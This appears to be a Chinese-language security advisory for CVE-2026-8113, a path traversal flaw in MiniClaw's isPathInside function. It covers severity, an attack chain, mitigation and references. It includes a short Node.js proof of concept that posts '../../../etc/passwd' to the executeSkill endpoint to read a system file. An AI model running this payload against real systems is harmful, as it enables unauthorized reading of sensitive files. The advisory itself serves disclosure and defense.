CVE-2026-8113 MiniClaw路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-8113

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

8421bit MiniClaw

漏洞概述

8421bit MiniClaw 在特定版本（commit 43905b9 之前）中存在路径遍历漏洞。该漏洞位于 src/kernel.ts 文件的 isPathInside 函数中，攻击者可通过网络远程利用 executeSkillScript 组件，绕过路径限制访问系统敏感文件。由于该产品采用滚动发布模式，受影响的具体版本号暂未明确，目前官方已发布修复补丁，建议用户尽快更新以降低安全风险。

技术细节

该漏洞的核心技术问题在于 src/kernel.ts 文件中的 isPathInside 函数未能正确处理和规范化用户输入的路径字符串。在 executeSkillScript 组件处理技能脚本执行请求时，未对路径中的跳转符号（如 "../" 或绝对路径符号）进行严格的过滤或解析。攻击者可以通过构造包含特殊序列的恶意 payload，欺骗路径校验逻辑，使其误判路径仍在安全范围内。成功利用该漏洞后，攻击者能够从受影响系统的任意位置读取文件，造成敏感信息泄露。鉴于攻击向量为网络、且无需用户交互，该漏洞具有较高的可利用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标服务器上运行了8421bit MiniClaw应用，并确认其版本未包含修复补丁。

STEP 2

2. 构造Payload

攻击者构造包含路径遍历序列（如 '../'）的恶意数据，旨在绕过isPathInside函数的检查。

STEP 3

3. 发送请求

攻击者通过网络向executeSkillScript组件发送特制的HTTP请求，触发漏洞。

STEP 4

4. 执行攻击

由于路径校验逻辑缺陷，系统读取了恶意Payload指定的路径文件，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-8113: Path Traversal in MiniClaw
// This script demonstrates how an attacker could exploit the isPathInside flaw.

const http = require('http');

const options = {
  hostname: 'localhost',
  port: 8080,
  path: '/api/executeSkill',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  }
};

// The payload uses '../' to traverse out of the intended directory
const maliciousPayload = JSON.stringify({
  script: '../../../etc/passwd'
});

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

req.on('error', (error) => {
  console.error(error);
});

req.write(maliciousPayload);
req.end();

影响范围

8421bit MiniClaw <= commit 43905b934cf76489ab28e4d17da28ee97970f91f

防御指南

临时缓解措施

在无法立即更新代码的情况下，建议在网络边界（如WAF或反向代理）部署过滤规则，拦截包含路径遍历字符（如 '../' 或 '%2e%2e'）的请求，以暂时缓解漏洞风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8113
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8113
3 Details https://www.cvedetails.com/cve/CVE-2026-8113/
4 VulDB https://vuldb.com/cve/CVE-2026-8113
5 Link https://github.com/8421bit/MiniClaw/
6 Link https://github.com/8421bit/MiniClaw/commit/e8bd4e17e9428260f2161378356affc5ce90d6ed
7 Link https://github.com/8421bit/MiniClaw/issues/5
8 Link https://github.com/8421bit/MiniClaw/pull/8
9 Link https://vuldb.com/submit/808167
10 Link https://vuldb.com/vuln/361901
11 Link https://vuldb.com/vuln/361901/cti